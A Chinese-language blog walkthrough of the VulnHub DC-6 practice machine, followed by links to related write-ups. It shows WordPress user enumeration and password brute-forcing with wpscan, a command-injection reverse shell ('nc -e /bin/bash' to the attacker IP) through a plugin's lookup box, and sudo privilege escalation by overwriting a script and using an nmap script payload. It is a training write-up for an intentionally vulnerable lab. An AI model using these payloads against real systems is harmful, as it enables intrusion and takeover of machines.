vulnhub DC: 6

最新推荐文章于 2022-09-30 14:04:11 发布
最新推荐文章于 2022-09-30 14:04:11 发布
阅读量585 收藏
点赞数
分类专栏: vulnhub 文章标签: 安全 sudo提权 wordpress wpscan rce
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/122395338
版权

渗透思路:

nmap扫描---->wpscan枚举wordpress用户---->wpscan暴力破解wordpress用户名密码---->利用RCE漏洞getshell---->sudo提权

环境信息:

攻击机ip:192.168.101.25

靶机ip:192.168.101.38

此外,根据vulnhub上的提示,渗透本靶机还需要在攻击机上配置hosts文件

hosts文件的位置:

linux系统:/etc/hosts

windows系统:C:\Windows\System32\drivers\etc\hosts

具体步骤:

步骤1:nmap扫描

sudo nmap -sS -A -p- 192.168.101.38

22端口(ssh)和80端口(http)开放,并且80端口是wordpress

步骤2:wpscan枚举wordpress用户

涉及到wordpress的站点,一般想到的方法是登录之后利用wordpress的一些后台功能getshell。所以首先需要登录。

用dirb和nikto扫描之后,都没有找到关于用户名和密码的信息。

这里来试试用wpscan枚举用户名。

输入如下命令,注意url参数值需要是http://wordy,不能是http://靶机ip

sudo wpscan --url http://wordy -e

找到5个用户名:admin,jens,mark,sarah,graham

把这些用户名以一行一个的格式保存在/home/kali/users.txt中备用。

步骤3:wpscan暴力破解wordpress用户名密码

关于wordpress登录密码,vulnhub上给了clue

rockyou.txt是kali自带的一个好大的字典,大到一开始是压缩包,要先解压缩才能用

解压缩

sudo gzip -d /usr/share/wordlists/rockyou.txt.gz

在rockyou.txt中查找包含k01的字符串,并写入文件passwords.txt

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

wpscan暴力破解wordpress用户名和密码:

sudo wpscan --url http://wordy -U '/home/kali/users.txt' -P '/home/kali/passwords.txt'

有一组用户名密码可用:用户名mark,密码helpdesk01 

在http://wordy/wp-login.php用这组用户名密码登录成功

步骤4: wpscan扫描有漏洞的plugin(没扫出来)

在http://wordy/wp-admin/转了一圈发现,mark用户并没有之前几个靶机中遇到过的Appearance页面,此路不通。

这时想到网站主页一直在强调安全的plugins,那么可以用wpscan扫扫看是否有有漏洞的plugin

用如下命令扫描: 

sudo wpscan --url http://wordy/ --http-auth mark:helpdesk01 -e vp

没扫出结果:

 

步骤5:利用RCE漏洞getshell

仔细观察http://wordy/wp-admin/之后发现Activity monitor的Tools选项卡有远程命令执行漏洞。

具体来说,在下图所示的输入框中输入 某个ip;某条命令 。比如192.168.101.1;whoami

会遇到前端输入长度限制的问题,只要在输入框上 右键--检查 把输入框的maxlength改大即可(原来是15,我改到了100)。

然后点Lookup按钮,可以发现whoami的命令执行结果www-data 

试了几种反弹shell之后,发现nc反弹shell好使。

攻击机上监听2333端口

nc -nlvp 2333

输入框中输入如下内容,点Lookup按钮后可得到反弹shell

127.0.0.1;nc -e /bin/bash 192.168.101.25 2333

输入

python -c 'import pty; pty.spawn("/bin/bash")'

得到交互式shell

步骤6:sudo提权

在反弹shell中找啊找,发现/home/mark/stuff目录下有个可疑文件things-to-do.txt

里面记录了一个新建的用户graham和其密码GSo7isUM1D4

用graham成功地进行了ssh登录在graham的shell中看看其是否有可以sudo执行的命令

sudo -l

发现 graham 可以以 jens的身份执行/home/jens/backups.sh

/home/jens/backups.sh的内容是备份/var/www/html文件夹,似乎没什么用。

但如果graham可以修改该文件的内容,就可以得到jens的shell。

ls -al

可以看到该文件的属组是devs 

再输入

id

可以看到graham用户也是devs的组成员。

也就是说graham用户可以修改/home/jens/backups.sh文件。

用echo命令改写/home/jens/backups.sh的内容

echo "/bin/bash" > backups.sh

用jens的身份执行,得到jens的shell

sudo -u jens /home/jens/backups.sh

 

查看jens可以sudo执行的命令,发现其可以以root的身份执行nmap命令

在gtfobins上查找nmap,找到sudo提权的payload

执行如下命令,得到root的shell 

TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

用python得到交互式shell

 python -c 'import pty; pty.spawn("/bin/bash")'

在/root/下找到theflag.txt文件,并读取其内容 

 

仙女象
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
mysql 帐户枚举漏洞_Wordpress < 4.7.1用户名枚举漏洞分析(CVE-2017-5487) | 绿盟科技技术博客...
weixin_35823441的博客
01-21 1804
阅读:4,380WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统来使用。WordPress 在4.7.0版本之后将REST API插件集成到默认功能之中。REST API为WordPress的使用者提供了一个方便快捷的管理接口。在WordPress 4.7.0版本中,存在着一个...
vulnhub】---DC-6靶机
qq_43168364的博客
08-21 650
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:靶机(192.168.15.154) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗
Vulnhub DC-6
柠檬木有枝
07-14 485
nmap 扫描服务 修改 hosts 文件 发现是 wordpress wpscan --url http://wordy/ --enumerate u 查看wordpress用户 爆破得密码 mark:helpdesk01 发现 active monitor 插件 搜索 exp ,反弹 shell 发现用户名密码 python -c 'import pty;pty.spawn("/b...
vulnhubdc6
qq_54030686的博客
06-14 854
DC系列第六篇,整体而言难度较低,此篇之后,不再进行较为细致的篇幅 总体逻辑:话不多说,开始干 主机发现,端口扫描 目标IP为192.168.43.140 开放两个端口22 和80 端口,其中80端口对应的服务为wordy,修改hosts文件,路径为/etc/hosts,添加值 22端口尝试进行爆破,采用用户名top50,字典使用弱口令top100进行尝试 未发现相应结果 进行指纹识别 发现为wordpress框架,使用wordpress专用扫描器进行检测,使用-e参数爆破用户 存在5个用户复制变异成字典
vulnhub-dc6-DC6
yutianovo的博客
10-06 347
靶机描述 DESCRIPTION DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This isn't an overly difficult challenge so should be great for beginners. The ultimate goal of this challenge is t
VulnHubDC-6
weixin_39219503的博客
02-01 307
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-6,315/ 题目信息如下 Description DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. T...
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场实战系列-DC-2实战
最新发布
05-18
vulnhub靶场实战系列-DC-2实战
Vulnhub靶机实战——DC-6
冠霖L的博客
10-28 3879
靶机DC-6下载地址:https://download.vulnhub.com/dc/DC-6.zip 环境:VMware 15虚拟机软件 DC-6靶机IP地址:192.168.220.139 Kali的IP地址:192.168.220.142 DC-6靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.142...
vulnhub-dc6
bqnagus
09-30 121
vulnhub-dc6靶机复现
VulnHub DC6
baynk的博客
05-20 190
0x00 靶机环境 下载地址1:https://www.vulnhub.com/entry/dc-6,315/ 下载地址2:https://pan.baidu.com/s/1XLCFaGbBvsf7g0SLIV5LTg 提取码:ni3g 只有一个flag 不过这里还有一个提示,看来是需要暴力破解了。 开肝 0x01 渗透流程 nmap走起,扫IP,扫服务 还是从web开始入手 有重定向,加hosts文件映射 又是一个wordpress站点 没啥思路,之前里面学了个wpscan用着看看 报错
Vulnhub靶机渗透测试——DC-6
Cobra的博客
05-18 359
一、实验环境 攻击机(kali):192.168.189.148 靶机(ubuntu):192.168.189.186 二、信息收集 1、使用nmap探测存活主机 nmap -sP 192.168.189.0/24 2、IP192.168.189.186为我们的靶机,再次使用nmap对其进行深度扫描 nmap -sV -A -T4 -p- 192.168.189.186 3、访问IP后发现不能正常访问,我们可以像dc2一样修改hosts文件 4、修改完成后即可正常访问
vulnhub渗透测试靶机DC-6
weixin_46128614的博客
01-19 470
靶机地址:https://www.vulnhub.com/entry/dc-6,315/ nmap –sS –sV –p- -T5 dirb跑一下,全是wp的目录 上wpscan 改一下hosts 加一条 192.168.49.20 wordy 没有发现漏洞 发现几个用户 逐一爆破吧 开开心心爆了半个小时,进度0.1%,这么多用户感觉爆破思路不会错,看了一眼师傅的wp,原来作者在vulnhu...
vulnhubDC6靶机
LainWith的博客
02-14 538
目录介绍信息收集主机发现主机信息探测访问网站wpscan测试站点登录站点反弹shell信息收集提权 介绍 系列: DC(此系列共10台) 发布日期:2019 年 4 月 26 日 难度:初级-中级 Flag:获取root权限,并拿到唯一的flag 学习: ● wordpress 安全测试 ● 本地代码执行 ● nmap 提权 靶机地址:https://www.vulnhub.com/entry/dc-6,315/ 提示信息: 靶机支持Virtualbox和Vmware 需要修改hosts文件,如:192.
靶机实操:vulnhub-DC6
不想当脚本小子的脚本小子
12-16 253
先扫描查看靶机的IP:192.168.249.139,再利用nmap扫描具体的信息,发现其开放了22端口来SSH登录,这里后面应该用得上 访问它的网站发现访问不了,但是可以ping通 ,应该是DNS的问题,vi /etc/hosts一下试试 CMS是wordpress,我可以先看看界面再用wpscan扫一下wordpress有没有漏洞可以利用。 dirbuster扫描到了很多有诱惑力的网站,但是都打不开: 那我就先用wpscan来扫一扫: ...
Vulnhub-DC-6靶机实战(Nmap提权)
御七彩虹猫
05-19 1545
Vulnhub-DC-6靶机实战(Nmap提权)
VulnHub入门教程:DC-1靶场攻破指南
6. **问题解决**:遇到新问题时,搜索能力很重要。初学者可能会碰到前所未见的挑战,这时使用搜索引擎(如 Google)寻找解决方案是非常常见的做法。 7. **安全道德**:在进行渗透测试时,必须始终遵循道德规范,仅...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值